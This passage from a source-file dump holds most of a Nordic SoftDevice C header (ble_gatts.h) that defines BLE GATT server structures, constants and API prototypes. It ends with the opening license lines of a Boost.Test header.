stack\r\n will read and write directly to the memory using the pointer provided in the APIs. There are no alignment requirements for the buffer. 
*/\r\n/** @} */\r\n\r\n/** @defgroup BLE_GATTS_AUTHORIZE_TYPES GATT Server Authorization Types\r\n * @{ */\r\n#define BLE_GATTS_AUTHORIZE_TYPE_INVALID 0x00 /**< Invalid Type. */\r\n#define BLE_GATTS_AUTHORIZE_TYPE_READ 0x01 /**< Authorize a Read Operation. */\r\n#define BLE_GATTS_AUTHORIZE_TYPE_WRITE 0x02 /**< Authorize a Write Request Operation. */\r\n/** @} */\r\n\r\n/** @defgroup BLE_GATTS_SYS_ATTR_FLAGS System Attribute Flags\r\n * @{ */\r\n#define BLE_GATTS_SYS_ATTR_FLAG_SYS_SRVCS (1 << 0) /**< Restrict system attributes to system services only. */\r\n#define BLE_GATTS_SYS_ATTR_FLAG_USR_SRVCS (1 << 1) /**< Restrict system attributes to user services only. */\r\n/** @} */\r\n\r\n/** @defgroup BLE_GATTS_ATTR_TAB_SIZE Attribute Table size\r\n * @{\r\n */\r\n#define BLE_GATTS_ATTR_TAB_SIZE_MIN 216 /**< Minimum Attribute Table size */\r\n#define BLE_GATTS_ATTR_TAB_SIZE_DEFAULT 0x0000 /**< Default Attribute Table size (0x700 bytes for this version of the SoftDevice). */\r\n/** @} */\r\n\r\n/** @} */\r\n\r\n/** @addtogroup BLE_GATTS_STRUCTURES Structures\r\n * @{ */\r\n\r\n/**\r\n * @brief BLE GATTS init options\r\n */\r\ntypedef struct\r\n{\r\n uint8_t service_changed:1; /**< Include the Service Changed characteristic in the Attribute Table. */\r\n uint32_t attr_tab_size; /**< Attribute Table size in bytes. The size must be a multiple of 4. @ref BLE_GATTS_ATTR_TAB_SIZE_DEFAULT is used to set the default size. */\r\n} ble_gatts_enable_params_t;\r\n\r\n/**@brief Attribute metadata. */\r\ntypedef struct\r\n{\r\n ble_gap_conn_sec_mode_t read_perm; /**< Read permissions. */\r\n ble_gap_conn_sec_mode_t write_perm; /**< Write permissions. */\r\n uint8_t vlen :1; /**< Variable length attribute. */\r\n uint8_t vloc :2; /**< Value location, see @ref BLE_GATTS_VLOCS.*/\r\n uint8_t rd_auth :1; /**< Read authorization and value will be requested from the application on every read operation. */\r\n uint8_t wr_auth :1; /**< Write authorization will be requested from the application on every Write Request operation (but not Write Command). */\r\n} ble_gatts_attr_md_t;\r\n\r\n\r\n/**@brief GATT Attribute. */\r\ntypedef struct\r\n{\r\n ble_uuid_t *p_uuid; /**< Pointer to the attribute UUID. */\r\n ble_gatts_attr_md_t *p_attr_md; /**< Pointer to the attribute metadata structure. */\r\n uint16_t init_len; /**< Initial attribute value length in bytes. */\r\n uint16_t init_offs; /**< Initial attribute value offset in bytes. If different from zero, the first init_offs bytes of the attribute value will be left uninitialized. */\r\n uint16_t max_len; /**< Maximum attribute value length in bytes, see @ref BLE_GATTS_ATTR_LENS_MAX for maximum values. */\r\n uint8_t* p_value; /**< Pointer to the attribute data. Please note that if the @ref BLE_GATTS_VLOC_USER value location is selected in the attribute metadata, this will have to point to a buffer\r\n that remains valid through the lifetime of the attribute. This excludes usage of automatic variables that may go out of scope or any other temporary location.\r\n The stack may access that memory directly without the application's knowledge. For writable characteristics, this value must not be a location in flash memory.*/\r\n} ble_gatts_attr_t;\r\n\r\n/**@brief GATT Attribute Value. */\r\ntypedef struct\r\n{\r\n uint16_t len; /**< Length in bytes to be written or read. Length in bytes written or read after successful return.*/\r\n uint16_t offset; /**< Attribute value offset. 
*/\r\n uint8_t *p_value; /**< Pointer to where value is stored or will be stored.\r\n If value is stored in user memory, only the attribute length is updated when p_value == NULL.\r\n Set to NULL when reading to obtain the complete length of the attribute value */\r\n} ble_gatts_value_t;\r\n\r\n\r\n/**@brief GATT Attribute Context. */\r\ntypedef struct\r\n{\r\n ble_uuid_t srvc_uuid; /**< Service UUID. */\r\n ble_uuid_t char_uuid; /**< Characteristic UUID if applicable (BLE_UUID_TYPE_UNKNOWN otherwise). */\r\n ble_uuid_t desc_uuid; /**< Descriptor UUID if applicable (BLE_UUID_TYPE_UNKNOWN otherwise). */\r\n uint16_t srvc_handle; /**< Service Handle. */\r\n uint16_t value_handle; /**< Characteristic Value Handle if applicable (BLE_GATT_HANDLE_INVALID otherwise). */\r\n uint8_t type; /**< Attribute Type, see @ref BLE_GATTS_ATTR_TYPES. */\r\n} ble_gatts_attr_context_t;\r\n\r\n\r\n/**@brief GATT Characteristic Presentation Format. */\r\ntypedef struct\r\n{\r\n uint8_t format; /**< Format of the value, see @ref BLE_GATT_CPF_FORMATS. */\r\n int8_t exponent; /**< Exponent for integer data types. */\r\n uint16_t unit; /**< Unit from Bluetooth Assigned Numbers. */\r\n uint8_t name_space; /**< Namespace from Bluetooth Assigned Numbers, see @ref BLE_GATT_CPF_NAMESPACES. */\r\n uint16_t desc; /**< Namespace description from Bluetooth Assigned Numbers, see @ref BLE_GATT_CPF_NAMESPACES. */\r\n} ble_gatts_char_pf_t;\r\n\r\n\r\n/**@brief GATT Characteristic metadata. */\r\ntypedef struct\r\n{\r\n ble_gatt_char_props_t char_props; /**< Characteristic Properties. */\r\n ble_gatt_char_ext_props_t char_ext_props; /**< Characteristic Extended Properties. */\r\n uint8_t *p_char_user_desc; /**< Pointer to a UTF-8 encoded string (non-NULL terminated), NULL if the descriptor is not required. */\r\n uint16_t char_user_desc_max_size; /**< The maximum size in bytes of the user description descriptor. */\r\n uint16_t char_user_desc_size; /**< The size of the user description, must be smaller or equal to char_user_desc_max_size. */\r\n ble_gatts_char_pf_t* p_char_pf; /**< Pointer to a presentation format structure or NULL if the CPF descriptor is not required. */\r\n ble_gatts_attr_md_t* p_user_desc_md; /**< Attribute metadata for the User Description descriptor, or NULL for default values. */\r\n ble_gatts_attr_md_t* p_cccd_md; /**< Attribute metadata for the Client Characteristic Configuration Descriptor, or NULL for default values. */\r\n ble_gatts_attr_md_t* p_sccd_md; /**< Attribute metadata for the Server Characteristic Configuration Descriptor, or NULL for default values. */\r\n} ble_gatts_char_md_t;\r\n\r\n\r\n/**@brief GATT Characteristic Definition Handles. */\r\ntypedef struct\r\n{\r\n uint16_t value_handle; /**< Handle to the characteristic value. */\r\n uint16_t user_desc_handle; /**< Handle to the User Description descriptor, or @ref BLE_GATT_HANDLE_INVALID if not present. */\r\n uint16_t cccd_handle; /**< Handle to the Client Characteristic Configuration Descriptor, or @ref BLE_GATT_HANDLE_INVALID if not present. */\r\n uint16_t sccd_handle; /**< Handle to the Server Characteristic Configuration Descriptor, or @ref BLE_GATT_HANDLE_INVALID if not present. */\r\n} ble_gatts_char_handles_t;\r\n\r\n\r\n/**@brief GATT HVx parameters. */\r\ntypedef struct\r\n{\r\n uint16_t handle; /**< Characteristic Value Handle. */\r\n uint8_t type; /**< Indication or Notification, see @ref BLE_GATT_HVX_TYPES. */\r\n uint16_t offset; /**< Offset within the attribute value. 
*/\r\n uint16_t *p_len; /**< Length in bytes to be written, length in bytes written after successful return. */\r\n uint8_t *p_data; /**< Actual data content, use NULL to use the current attribute value. */\r\n} ble_gatts_hvx_params_t;\r\n\r\n/**@brief GATT Read Authorization parameters. */\r\ntypedef struct\r\n{\r\n uint16_t gatt_status; /**< GATT status code for the operation, see @ref BLE_GATT_STATUS_CODES. */\r\n uint8_t update : 1; /**< If set, data supplied in p_data will be used in the ATT response. */\r\n uint16_t offset; /**< Offset of the attribute value being updated. */\r\n uint16_t len; /**< Length in bytes of the value in p_data pointer, see @ref BLE_GATTS_ATTR_LENS_MAX. */\r\n uint8_t *p_data; /**< Pointer to new value used to update the attribute value. */\r\n} ble_gatts_read_authorize_params_t;\r\n\r\n/**@brief GATT Write Authorization parameters. */\r\ntypedef struct\r\n{\r\n uint16_t gatt_status; /**< GATT status code for the operation, see @ref BLE_GATT_STATUS_CODES. */\r\n} ble_gatts_write_authorize_params_t;\r\n\r\n/**@brief GATT Read or Write Authorize Reply parameters. */\r\ntypedef struct\r\n{\r\n uint8_t type; /**< Type of authorize operation, see @ref BLE_GATTS_AUTHORIZE_TYPES. */\r\n union {\r\n ble_gatts_read_authorize_params_t read; /**< Read authorization parameters. */\r\n ble_gatts_write_authorize_params_t write; /**< Write authorization parameters. */\r\n } params; /**< Reply Parameters. */\r\n} ble_gatts_rw_authorize_reply_params_t;\r\n\r\n\r\n\r\n/**@brief Event structure for @ref BLE_GATTS_EVT_WRITE. */\r\ntypedef struct\r\n{\r\n uint16_t handle; /**< Attribute Handle. */\r\n uint8_t op; /**< Type of write operation, see @ref BLE_GATTS_OPS. */\r\n ble_gatts_attr_context_t context; /**< Attribute Context. */\r\n uint16_t offset; /**< Offset for the write operation. */\r\n uint16_t len; /**< Length of the received data. */\r\n uint8_t data[1]; /**< Received data, variable length. */\r\n} ble_gatts_evt_write_t;\r\n\r\n/**@brief Event substructure for authorized read requests, see @ref ble_gatts_evt_rw_authorize_request_t. */\r\ntypedef struct\r\n{\r\n uint16_t handle; /**< Attribute Handle. */\r\n ble_gatts_attr_context_t context; /**< Attribute Context. */\r\n uint16_t offset; /**< Offset for the read operation. */\r\n} ble_gatts_evt_read_t;\r\n\r\n/**@brief Event structure for @ref BLE_GATTS_EVT_RW_AUTHORIZE_REQUEST. */\r\ntypedef struct\r\n{\r\n uint8_t type; /**< Type of authorize operation, see @ref BLE_GATTS_AUTHORIZE_TYPES. */\r\n union {\r\n ble_gatts_evt_read_t read; /**< Attribute Read Parameters. */\r\n ble_gatts_evt_write_t write; /**< Attribute Write Parameters. */\r\n } request; /**< Request Parameters. */\r\n} ble_gatts_evt_rw_authorize_request_t;\r\n\r\n/**@brief Event structure for @ref BLE_GATTS_EVT_SYS_ATTR_MISSING. */\r\ntypedef struct\r\n{\r\n uint8_t hint; /**< Hint (currently unused). */\r\n} ble_gatts_evt_sys_attr_missing_t;\r\n\r\n\r\n/**@brief Event structure for @ref BLE_GATTS_EVT_HVC. */\r\ntypedef struct\r\n{\r\n uint16_t handle; /**< Attribute Handle. */\r\n} ble_gatts_evt_hvc_t;\r\n\r\n/**@brief Event structure for @ref BLE_GATTS_EVT_TIMEOUT. */\r\ntypedef struct\r\n{\r\n uint8_t src; /**< Timeout source, see @ref BLE_GATT_TIMEOUT_SOURCES. */\r\n} ble_gatts_evt_timeout_t;\r\n\r\n\r\n/**@brief GATT Server event callback event structure. */\r\ntypedef struct\r\n{\r\n uint16_t conn_handle; /**< Connection Handle on which the event occurred. */\r\n union\r\n {\r\n ble_gatts_evt_write_t write; /**< Write Event Parameters. 
*/\r\n ble_gatts_evt_rw_authorize_request_t authorize_request; /**< Read or Write Authorize Request Parameters. */\r\n ble_gatts_evt_sys_attr_missing_t sys_attr_missing; /**< System attributes missing. */\r\n ble_gatts_evt_hvc_t hvc; /**< Handle Value Confirmation Event Parameters. */\r\n ble_gatts_evt_timeout_t timeout; /**< Timeout Event. */\r\n } params; /**< Event Parameters. */\r\n} ble_gatts_evt_t;\r\n\r\n/** @} */\r\n\r\n/** @addtogroup BLE_GATTS_FUNCTIONS Functions\r\n * @{ */\r\n\r\n/**@brief Add a service declaration to the Attribute Table.\r\n *\r\n * @param[in] type Toggles between primary and secondary services, see @ref BLE_GATTS_SRVC_TYPES.\r\n * @param[in] p_uuid Pointer to service UUID.\r\n * @param[out] p_handle Pointer to a 16-bit word where the assigned handle will be stored.\r\n *\r\n * @note Secondary Services are only relevant in the context of the entity that references them, it is therefore forbidden to\r\n * add a secondary service declaration that is not referenced by another service later in the Attribute Table.\r\n *\r\n * @retval ::NRF_SUCCESS Successfully added a service declaration.\r\n * @retval ::NRF_ERROR_INVALID_ADDR Invalid pointer supplied.\r\n * @retval ::NRF_ERROR_INVALID_PARAM Invalid parameter(s) supplied, Vendor Specific UUIDs need to be present in the table.\r\n * @retval ::NRF_ERROR_FORBIDDEN Forbidden value supplied, certain UUIDs are reserved for the stack.\r\n * @retval ::NRF_ERROR_NO_MEM Not enough memory to complete operation.\r\n */\r\nSVCALL(SD_BLE_GATTS_SERVICE_ADD, uint32_t, sd_ble_gatts_service_add(uint8_t type, ble_uuid_t const *p_uuid, uint16_t *p_handle));\r\n\r\n\r\n/**@brief Add an include declaration to the Attribute Table.\r\n *\r\n * @note It is currently only possible to add an include declaration to the last added service (i.e. only sequential population is supported at this time).\r\n *\r\n * @note The included service must already be present in the Attribute Table prior to this call.\r\n *\r\n * @param[in] service_handle Handle of the service where the included service is to be placed, if @ref BLE_GATT_HANDLE_INVALID is used, it will be placed sequentially.\r\n * @param[in] inc_srvc_handle Handle of the included service.\r\n * @param[out] p_include_handle Pointer to a 16-bit word where the assigned handle will be stored.\r\n *\r\n * @retval ::NRF_SUCCESS Successfully added an include declaration.\r\n * @retval ::NRF_ERROR_INVALID_ADDR Invalid pointer supplied.\r\n * @retval ::NRF_ERROR_INVALID_PARAM Invalid parameter(s) supplied, handle values need to match previously added services.\r\n * @retval ::NRF_ERROR_INVALID_STATE Invalid state to perform operation.\r\n * @retval ::NRF_ERROR_FORBIDDEN Forbidden value supplied, self inclusions are not allowed.\r\n * @retval ::NRF_ERROR_NO_MEM Not enough memory to complete operation.\r\n * @retval ::NRF_ERROR_NOT_FOUND Attribute not found.\r\n */\r\nSVCALL(SD_BLE_GATTS_INCLUDE_ADD, uint32_t, sd_ble_gatts_include_add(uint16_t service_handle, uint16_t inc_srvc_handle, uint16_t *p_include_handle));\r\n\r\n\r\n/**@brief Add a characteristic declaration, a characteristic value declaration and optional characteristic descriptor declarations to the Attribute Table.\r\n *\r\n * @note It is currently only possible to add a characteristic to the last added service (i.e. 
only sequential population is supported at this time).\r\n *\r\n * @note Several restrictions apply to the parameters, such as matching permissions between the user description descriptor and the writeable auxiliaries bits,\r\n * readable (no security) and writeable (selectable) CCCDs and SCCDs and valid presentation format values.\r\n *\r\n * @note If no metadata is provided for the optional descriptors, their permissions will be derived from the characteristic permissions.\r\n *\r\n * @param[in] service_handle Handle of the service where the characteristic is to be placed, if @ref BLE_GATT_HANDLE_INVALID is used, it will be placed sequentially.\r\n * @param[in] p_char_md Characteristic metadata.\r\n * @param[in] p_attr_char_value Pointer to the attribute structure corresponding to the characteristic value.\r\n * @param[out] p_handles Pointer to the structure where the assigned handles will be stored.\r\n *\r\n * @retval ::NRF_SUCCESS Successfully added a characteristic.\r\n * @retval ::NRF_ERROR_INVALID_ADDR Invalid pointer supplied.\r\n * @retval ::NRF_ERROR_INVALID_PARAM Invalid parameter(s) supplied, service handle, Vendor Specific UUIDs, lengths, and permissions need to adhere to the constraints.\r\n * @retval ::NRF_ERROR_INVALID_STATE Invalid state to perform operation, a service context is required.\r\n * @retval ::NRF_ERROR_FORBIDDEN Forbidden value supplied, certain UUIDs are reserved for the stack.\r\n * @retval ::NRF_ERROR_NO_MEM Not enough memory to complete operation.\r\n * @retval ::NRF_ERROR_DATA_SIZE Invalid data size(s) supplied, attribute lengths are restricted by @ref BLE_GATTS_ATTR_LENS_MAX.\r\n */\r\nSVCALL(SD_BLE_GATTS_CHARACTERISTIC_ADD, uint32_t, sd_ble_gatts_characteristic_add(uint16_t service_handle, ble_gatts_char_md_t const *p_char_md, ble_gatts_attr_t const *p_attr_char_value, ble_gatts_char_handles_t *p_handles));\r\n\r\n\r\n/**@brief Add a descriptor to the Attribute Table.\r\n *\r\n * @note It is currently only possible to add a descriptor to the last added characteristic (i.e. only sequential population is supported at this time).\r\n *\r\n * @param[in] char_handle Handle of the characteristic where the descriptor is to be placed, if @ref BLE_GATT_HANDLE_INVALID is used, it will be placed sequentially.\r\n * @param[in] p_attr Pointer to the attribute structure.\r\n * @param[out] p_handle Pointer to a 16-bit word where the assigned handle will be stored.\r\n *\r\n * @retval ::NRF_SUCCESS Successfully added a descriptor.\r\n * @retval ::NRF_ERROR_INVALID_ADDR Invalid pointer supplied.\r\n * @retval ::NRF_ERROR_INVALID_PARAM Invalid parameter(s) supplied, characteristic handle, Vendor Specific UUIDs, lengths, and permissions need to adhere to the constraints.\r\n * @retval ::NRF_ERROR_INVALID_STATE Invalid state to perform operation, a characteristic context is required.\r\n * @retval ::NRF_ERROR_FORBIDDEN Forbidden value supplied, certain UUIDs are reserved for the stack.\r\n * @retval ::NRF_ERROR_NO_MEM Not enough memory to complete operation.\r\n * @retval ::NRF_ERROR_DATA_SIZE Invalid data size(s) supplied, attribute lengths are restricted by @ref BLE_GATTS_ATTR_LENS_MAX.\r\n */\r\nSVCALL(SD_BLE_GATTS_DESCRIPTOR_ADD, uint32_t, sd_ble_gatts_descriptor_add(uint16_t char_handle, ble_gatts_attr_t const *p_attr, uint16_t *p_handle));\r\n\r\n/**@brief Set the value of a given attribute.\r\n *\r\n * @param[in] conn_handle Connection handle. 
If the value does not belong to a system attribute then @ref BLE_CONN_HANDLE_INVALID can be used.\r\n * @param[in] handle Attribute handle.\r\n * @param[in,out] p_value Attribute value information.\r\n *\r\n * @note Values other than system attributes can be set at any time, regardless of whether any active connections exist.\r\n *\r\n * @retval ::NRF_SUCCESS Successfully set the value of the attribute.\r\n * @retval ::NRF_ERROR_INVALID_ADDR Invalid pointer supplied.\r\n * @retval ::NRF_ERROR_INVALID_PARAM Invalid parameter(s) supplied.\r\n * @retval ::NRF_ERROR_NOT_FOUND Attribute not found.\r\n * @retval ::NRF_ERROR_FORBIDDEN Forbidden handle supplied, certain attributes are not modifiable by the application.\r\n * @retval ::NRF_ERROR_DATA_SIZE Invalid data size(s) supplied, attribute lengths are restricted by @ref BLE_GATTS_ATTR_LENS_MAX.\r\n * @retval ::BLE_ERROR_INVALID_CONN_HANDLE Invalid connection handle supplied.\r\n * @retval ::BLE_ERROR_GATTS_INVALID_ATTR_TYPE @ref BLE_CONN_HANDLE_INVALID supplied on a system attribute.\r\n */\r\n#ifndef __RFduino__\r\nSVCALL(SD_BLE_GATTS_VALUE_SET, uint32_t, sd_ble_gatts_value_set(uint16_t conn_handle, uint16_t handle, ble_gatts_value_t *p_value));\r\n#else\r\nSVCALL(SD_BLE_GATTS_VALUE_SET, uint32_t, sd_ble_gatts_value_set(uint16_t handle, uint16_t offset, uint16_t* const p_len, uint8_t const * const p_value));\r\n#endif\r\n\r\n/**@brief Get the value of a given attribute.\r\n *\r\n * @param[in] conn_handle Connection handle. If the value does not belong to a system attribute then @ref BLE_CONN_HANDLE_INVALID can be used.\r\n * @param[in] handle Attribute handle.\r\n * @param[in,out] p_value Attribute value information.\r\n *\r\n * @note If the attribute value is longer than the size of the supplied buffer,\r\n * p_len will return the total attribute value length (excluding offset),\r\n * and not the number of bytes actually returned in p_data.\r\n * The application may use this information to allocate a suitable buffer size.\r\n *\r\n * @note When retrieving system attribute values with this function, the connection handle\r\n * may refer to an already disconnected connection. Refer to the documentation of\r\n * @ref sd_ble_gatts_sys_attr_get for further information.\r\n *\r\n * @retval ::NRF_SUCCESS Successfully retrieved the value of the attribute.\r\n * @retval ::NRF_ERROR_INVALID_ADDR Invalid pointer supplied.\r\n * @retval ::NRF_ERROR_NOT_FOUND Attribute not found.\r\n * @retval ::BLE_ERROR_INVALID_CONN_HANDLE Invalid connection handle supplied.\r\n * @retval ::BLE_ERROR_GATTS_INVALID_ATTR_TYPE @ref BLE_CONN_HANDLE_INVALID supplied on a system attribute.\r\n */\r\nSVCALL(SD_BLE_GATTS_VALUE_GET, uint32_t, sd_ble_gatts_value_get(uint16_t conn_handle, uint16_t handle, ble_gatts_value_t *p_value));\r\n\r\n/**@brief Notify or Indicate an attribute value.\r\n *\r\n * @details This function checks for the relevant Client Characteristic Configuration descriptor value to verify that the relevant operation\r\n * (notification or indication) has been enabled by the client. 
It is also able to update the attribute value before issuing the PDU, so that\r\n * the application can atomically perform a value update and a server initiated transaction with a single API call.\r\n * If the application chooses to indicate an attribute value, a @ref BLE_GATTS_EVT_HVC event will be issued as soon as the confirmation arrives from\r\n * the peer.\r\n *\r\n * @note The local attribute value may be updated even if an outgoing packet is not sent to the peer due to an error during execution.\r\n * When receiving the error codes @ref NRF_ERROR_INVALID_STATE, @ref NRF_ERROR_BUSY, @ref BLE_ERROR_GATTS_SYS_ATTR_MISSING and\r\n * @ref BLE_ERROR_NO_TX_BUFFERS the Attribute Table has been updated.\r\n * The caller can check whether the value has been updated by looking at the contents of *(p_hvx_params->p_len).\r\n *\r\n * @note It is important to note that a notification will consume an application buffer, and will therefore\r\n * generate a @ref BLE_EVT_TX_COMPLETE event when the packet has been transmitted. An indication on the other hand will use the\r\n * standard server internal buffer and thus will only generate a @ref BLE_GATTS_EVT_HVC event as soon as the confirmation\r\n * has been received from the peer. Please see the documentation of @ref sd_ble_tx_buffer_count_get for more details.\r\n *\r\n * @param[in] conn_handle Connection handle.\r\n * @param[in] p_hvx_params Pointer to an HVx parameters structure. If the p_data member contains a non-NULL pointer the attribute value will be updated with\r\n * the contents pointed by it before sending the notification or indication.\r\n *\r\n * @retval ::NRF_SUCCESS Successfully queued a notification or indication for transmission, and optionally updated the attribute value.\r\n * @retval ::BLE_ERROR_INVALID_CONN_HANDLE Invalid Connection Handle.\r\n * @retval ::NRF_ERROR_INVALID_STATE Invalid Connection State or notifications and/or indications not enabled in the CCCD.\r\n * @retval ::NRF_ERROR_INVALID_ADDR Invalid pointer supplied.\r\n * @retval ::NRF_ERROR_INVALID_PARAM Invalid parameter(s) supplied.\r\n * @retval ::BLE_ERROR_INVALID_ATTR_HANDLE Invalid attribute handle(s) supplied. Only attributes added directly by the application are available to notify and indicate.\r\n * @retval ::BLE_ERROR_GATTS_INVALID_ATTR_TYPE Invalid attribute type(s) supplied, only characteristic values may be notified and indicated.\r\n * @retval ::NRF_ERROR_NOT_FOUND Attribute not found.\r\n * @retval ::NRF_ERROR_DATA_SIZE Invalid data size(s) supplied.\r\n * @retval ::NRF_ERROR_BUSY Procedure already in progress.\r\n * @retval ::BLE_ERROR_GATTS_SYS_ATTR_MISSING System attributes missing, use @ref sd_ble_gatts_sys_attr_set to set them to a known value.\r\n * @retval ::BLE_ERROR_NO_TX_BUFFERS There are no available buffers to send the data, applies only to notifications.\r\n */\r\nSVCALL(SD_BLE_GATTS_HVX, uint32_t, sd_ble_gatts_hvx(uint16_t conn_handle, ble_gatts_hvx_params_t const *p_hvx_params));\r\n\r\n/**@brief Indicate the Service Changed attribute value.\r\n *\r\n * @details This call will send a Handle Value Indication to one or more peers connected to inform them that the Attribute\r\n * Table layout has changed. 
As soon as the peer has confirmed the indication, a @ref BLE_GATTS_EVT_SC_CONFIRM event will\r\n * be issued.\r\n *\r\n * @note Some of the restrictions and limitations that apply to @ref sd_ble_gatts_hvx also apply here.\r\n *\r\n * @param[in] conn_handle Connection handle.\r\n * @param[in] start_handle Start of affected attribute handle range.\r\n * @param[in] end_handle End of affected attribute handle range.\r\n *\r\n * @retval ::NRF_SUCCESS Successfully queued the Service Changed indication for transmission.\r\n * @retval ::BLE_ERROR_INVALID_CONN_HANDLE Invalid Connection Handle.\r\n * @retval ::NRF_ERROR_INVALID_STATE Invalid Connection State or notifications and/or indications not enabled in the CCCD.\r\n * @retval ::NRF_ERROR_INVALID_PARAM Invalid parameter(s) supplied.\r\n * @retval ::BLE_ERROR_INVALID_ATTR_HANDLE Invalid attribute handle(s) supplied, handles must be in the range populated by the application.\r\n * @retval ::NRF_ERROR_INVALID_STATE Invalid state to perform operation, notifications or indications must be enabled in the CCCD.\r\n * @retval ::NRF_ERROR_BUSY Procedure already in progress.\r\n * @retval ::BLE_ERROR_GATTS_SYS_ATTR_MISSING System attributes missing, use @ref sd_ble_gatts_sys_attr_set to set them to a known value.\r\n */\r\nSVCALL(SD_BLE_GATTS_SERVICE_CHANGED, uint32_t, sd_ble_gatts_service_changed(uint16_t conn_handle, uint16_t start_handle, uint16_t end_handle));\r\n\r\n/**@brief Respond to a Read/Write authorization request.\r\n *\r\n * @note This call should only be used as a response to a @ref BLE_GATTS_EVT_RW_AUTHORIZE_REQUEST event issued to the application.\r\n *\r\n * @param[in] conn_handle Connection handle.\r\n * @param[in] p_rw_authorize_reply_params Pointer to a structure with the attribute provided by the application.\r\n *\r\n * @retval ::NRF_SUCCESS Successfully queued a response to the peer, and in the case of a write operation, Attribute Table updated.\r\n * @retval ::BLE_ERROR_INVALID_CONN_HANDLE Invalid Connection Handle.\r\n * @retval ::NRF_ERROR_INVALID_STATE Invalid Connection State or no authorization request pending.\r\n * @retval ::NRF_ERROR_INVALID_PARAM Authorization op invalid,\r\n * or for Read Authorization reply: requested handles not replied with,\r\n * or for Write Authorization reply: handle supplied does not match requested handle.\r\n * @retval ::NRF_ERROR_BUSY The stack is busy. 
Retry at a later time.\r\n */\r\nSVCALL(SD_BLE_GATTS_RW_AUTHORIZE_REPLY, uint32_t, sd_ble_gatts_rw_authorize_reply(uint16_t conn_handle, ble_gatts_rw_authorize_reply_params_t const *p_rw_authorize_reply_params));\r\n\r\n\r\n/**@brief Update persistent system attribute information.\r\n *\r\n * @details Supply information about persistent system attributes to the stack,\r\n * previously obtained using @ref sd_ble_gatts_sys_attr_get.\r\n * This call is only allowed for active connections, and is usually\r\n * made immediately after a connection is established with a known bonded device,\r\n * often as a response to a @ref BLE_GATTS_EVT_SYS_ATTR_MISSING.\r\n *\r\n * p_sysattrs may point directly to the application's stored copy of the system attributes\r\n * obtained using @ref sd_ble_gatts_sys_attr_get.\r\n * If the pointer is NULL, the system attribute info is initialized, assuming that\r\n * the application does not have any previously saved system attribute data for this device.\r\n *\r\n * @note The state of persistent system attributes is reset upon connection establishment and then remembered for its duration.\r\n *\r\n * @note If this call returns with an error code different from @ref NRF_SUCCESS, the storage of persistent system attributes may have been completed only partially.\r\n * This means that the state of the attribute table is undefined, and the application should either provide a new set of attributes using this same call or\r\n * reset the SoftDevice to return to a known state.\r\n *\r\n * @note When the @ref BLE_GATTS_SYS_ATTR_FLAG_SYS_SRVCS is used with this function, only the system attributes included in system services will be modified.\r\n * @note When the @ref BLE_GATTS_SYS_ATTR_FLAG_USR_SRVCS is used with this function, only the system attributes included in user services will be modified.\r\n *\r\n * @param[in] conn_handle Connection handle.\r\n * @param[in] p_sys_attr_data Pointer to a saved copy of system attributes supplied to the stack, or NULL.\r\n * @param[in] len Size of data pointed by p_sys_attr_data, in octets.\r\n * @param[in] flags Optional additional flags, see @ref BLE_GATTS_SYS_ATTR_FLAGS\r\n *\r\n * @retval ::NRF_SUCCESS Successfully set the system attribute information.\r\n * @retval ::BLE_ERROR_INVALID_CONN_HANDLE Invalid Connection Handle.\r\n * @retval ::NRF_ERROR_INVALID_STATE Invalid Connection State.\r\n * @retval ::NRF_ERROR_INVALID_DATA Invalid data supplied, the data should be exactly the same as retrieved with @ref sd_ble_gatts_sys_attr_get.\r\n * @retval ::NRF_ERROR_NO_MEM Not enough memory to complete operation.\r\n * @retval ::NRF_ERROR_BUSY The stack is busy. Retry at a later time.\r\n */\r\n#ifndef __RFduino__\r\nSVCALL(SD_BLE_GATTS_SYS_ATTR_SET, uint32_t, sd_ble_gatts_sys_attr_set(uint16_t conn_handle, uint8_t const *p_sys_attr_data, uint16_t len, uint32_t flags));\r\n#else\r\nSVCALL(SD_BLE_GATTS_SYS_ATTR_SET, uint32_t, sd_ble_gatts_sys_attr_set(uint16_t conn_handle, uint8_t const*const p_sys_attr_data, uint16_t len));\r\n#endif\r\n\r\n/**@brief Retrieve persistent system attribute information from the stack.\r\n *\r\n * @details This call is used to retrieve information about values to be stored persistently by the application\r\n * during the lifetime of a connection or after it has been terminated. 
When a new connection is established with the same bonded device,\r\n * the system attribute information retrieved with this function should be restored using @ref sd_ble_gatts_sys_attr_set.\r\n * If retrieved after disconnection, the data should be read before a new connection is established. The connection handle for\r\n * the previous, now disconnected, connection will remain valid until a new one is created to allow this API call to refer to it.\r\n * Connection handles belonging to active connections can be used as well, but care should be taken since the system attributes\r\n * may be written to at any time by the peer during a connection's lifetime.\r\n *\r\n * @note When the @ref BLE_GATTS_SYS_ATTR_FLAG_SYS_SRVCS is used with this function, only the system attributes included in system services will be returned.\r\n * @note When the @ref BLE_GATTS_SYS_ATTR_FLAG_USR_SRVCS is used with this function, only the system attributes included in user services will be returned.\r\n *\r\n * @param[in] conn_handle Connection handle of the recently terminated connection.\r\n * @param[out] p_sys_attr_data Pointer to a buffer where updated information about system attributes will be filled in. NULL can be provided to\r\n * obtain the length of the data\r\n * @param[in,out] p_len Size of application buffer if p_sys_attr_data is not NULL. Unconditionally updated to actual length of system attribute data.\r\n * @param[in] flags Optional additional flags, see @ref BLE_GATTS_SYS_ATTR_FLAGS\r\n *\r\n * @retval ::NRF_SUCCESS Successfully retrieved the system attribute information.\r\n * @retval ::BLE_ERROR_INVALID_CONN_HANDLE Invalid Connection Handle.\r\n * @retval ::NRF_ERROR_INVALID_ADDR Invalid pointer supplied.\r\n * @retval ::NRF_ERROR_DATA_SIZE The system attribute information did not fit into the provided buffer.\r\n * @retval ::NRF_ERROR_NOT_FOUND No system attributes found.\r\n */\r\nSVCALL(SD_BLE_GATTS_SYS_ATTR_GET, uint32_t, sd_ble_gatts_sys_attr_get(uint16_t conn_handle, uint8_t *p_sys_attr_data, uint16_t *p_len, uint32_t flags));\r\n\r\n/** @} */\r\n\r\n#endif // BLE_GATTS_H__\r\n\r\n/**\r\n @}\r\n*/\r\n"} {"text": "// (C) Copyright Gennadiy Rozental 2001.\r\n// Distributed under the Boost Software License, Version 1.0.\r\n// (See accompanying file LICENSE_1_0.txt or copy at\r\n// http://www.boost.org/LICENSE_1_0.txt)\r\n\r\n// See http://www.boost.org/libs/test for the library home page.\r\n//\r\n// File : $RCSfile$\r\n//\r\n// Version : $Revision$\r\n//\r\n// Description : model of actual argument (both typed and abstract interface)\r\n// ***************************************************************************\r\n\r\n#ifndef BOOST_TEST_UTILS_RUNTIME_ARGUMENT_HPP\r\n#define 